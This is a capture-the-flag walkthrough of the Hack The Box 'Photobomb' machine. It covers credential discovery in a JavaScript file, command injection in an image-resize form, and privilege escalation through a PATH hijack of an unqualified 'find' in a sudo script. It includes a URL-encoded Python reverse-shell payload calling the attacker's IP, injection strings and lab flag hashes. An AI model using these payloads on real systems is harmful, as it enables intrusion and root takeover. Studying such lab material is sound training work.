Machine Info

Spoiler
Photobomb is an easy Linux machine where plaintext credentials are used to access an internal web application with a Download functionality that is vulnerable to a blind command injection. Once a foothold as the machine’s main user is established, a poorly configured shell script that references binaries without their full paths is leveraged to obtain escalated privileges, as it can be ran with `sudo

Host / IP

10.10.11.182 / PHOTOBOMB.HTB. We add the record to our /etc/hosts.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

└─$ nmap -p- --min-rate 10000 10.10.11.189
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-04 20:04 UTC
Nmap scan report for 10.10.11.182
Host is up (0.088s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http


└─$ nmap -p 22,80 -sCV 10.10.11.182
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-04 20:05 UTC
Nmap scan report for 10.10.11.182
Host is up (0.086s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see a web port open and SSH one. Let’s visit the web page.

Website

We see a web page that is about photography and has a link for a web (basic-auth) login modal. The path is /printer.

We need to try and find the teck stack of the web page. The headers done’t give us much tbh. Browsing at the Deb Tools we see on the <head> a script being loaded.

1
2
3

<title>Photobomb</title>
<link type="text/css" rel="stylesheet" href="styles.css" media="all">
<script src="photobomb.js"></script>

Looking at the debugger tab we find the js script and it has plaintext username and password.

Plaintext credentials
1
2
3
4
5
6
7

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:[email protected]/printer');
  }
}
window.onload = init;

pH0t0:b0Mb!

We login the printer and we see a collage of pictures ready to download in differnt sizes and formats.

We are going to capture a request with Burp to analyze it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i

photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg&dimensions=300x200

We still don’t have much of an info about the server or its vulnerable spots. Let’s try to mess with it and send a request with altered argumements like this: photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg& We basically omit the dimensions parameter.

And boom! We get a 500 server error page with all this info.

Searching about the software didn’t lead to much. We need to understand the logic hereand how the app resizes all the photos in each request.

Info

The idea here is that the server uses a tool to convert the images to different sizes. One of the most common tools in Linux is convert from ImageMagick. How does that work?

1

convert original.jpg -resize 1000x1000 new.png

If that’s what the server is using the our input is put like that:

1

convert [photo] -resize [dimensions] new.[filetype]

Command Injection

1
2
3

photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg;sleep+5&filetype=jpg&dimensions=300x200

photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg&dimensions=300x200;sleep+5

Putting commands after the photo or the dimensions parameter didn’t help it seems. We were getting 500 errors and no delay from sleep 5 command.

But we were able to see achive the injection here:

1

photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;sleep+5&dimensions=300x200

The response came after 5 seconds, which means that sleep 5 got executed!

So let’s try to establish a rev shell now. We fire nc -lvnp 9001 and we launch our payload:

Command Injection
1

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png%20%3b%20python3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.14.9%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22%2Fbin%2Fbash%22%29%27&dimensions=20x20```

Our payload got executed and we have established a rev shell. Now let’s grab the flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.182] 37068
wizard@photobomb:~/photobomb$ ls        
ls
log  photobomb.sh  public  resized_images  server.rb  source_images
wizard@photobomb:~/photobomb$ cd  
cd 
wizard@photobomb:~$ ls
ls
photobomb  user.txt
wizard@photobomb:~$ cat user.txt
cat user.txt
9c5c894768bddb24189d670bf188eed1

Root

Tip

Before we start approaching this we just going to upgrade our shell:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

wizard@photobomb:~/photobomb$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
wizard@photobomb:~$ ^Z
zsh: suspended  nc -lnvp 9001
                                                                                                                              
┌──(p4n4㉿kali)-[~/Desktop/photobomb]
└─$ stty raw -echo; fg             
[1]  + continued  nc -lnvp 9001
                               reset
reset: unknown terminal type unknown
Terminal type? screen
wizard@photobomb:~$ pwd
/home/wizard
wizard@photobomb:~$ ls
photobomb  user.txt

More about this here

Enumeration

First thing we check sudo.

1
2
3
4
5
6
7
8

wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$
Info

Things to point from this:

  • user can run /opt/cleanup.sh as root.
  • SETENV means that the current environment will be used rather than a fresh one.

The script below looks like it’s for managing some logs and keeping “safe” the picture of the web app:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

The weak spot here is clearly the find command that is referenced without the full path of it. It’s a very simple path hijack.

Tip
That means that Bash will search the binary find in the directories that are specified in the $PATH environment variable.

Root shell

Expose path hijack for `find`

We will expose that path hijack vulnerability by simply making a script that runs bash and will name it find! Then we are going to make it executable.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

wizard@photobomb:/dev/shm$ echo -e '#!/bin/bash\n\nbash' > find
wizard@photobomb:/dev/shm$ ls
find  multipath
wizard@photobomb:/dev/shm$ cat find
#!/bin/bash

bash
wizard@photobomb:/dev/shm$ chmod +x find
wizard@photobomb:/dev/shm$ sudo PATH=$PWD:$PATH /opt/cleanup.sh 
root@photobomb:/home/wizard/photobomb# cat     cd  
root@photobomb:/home/wizard/photobomb# cd
root@photobomb:~# ls
root.txt
root@photobomb:~# cat root.txt 
1519ac51547d0853de632fcf56d7d7ea

If we were to execute sudo /opt/cleanup.sh we were going to get just another bash shell with wizard user.

Tip
We need to run the script as sudo but specify also the PATH variable, adding to the current directory in front!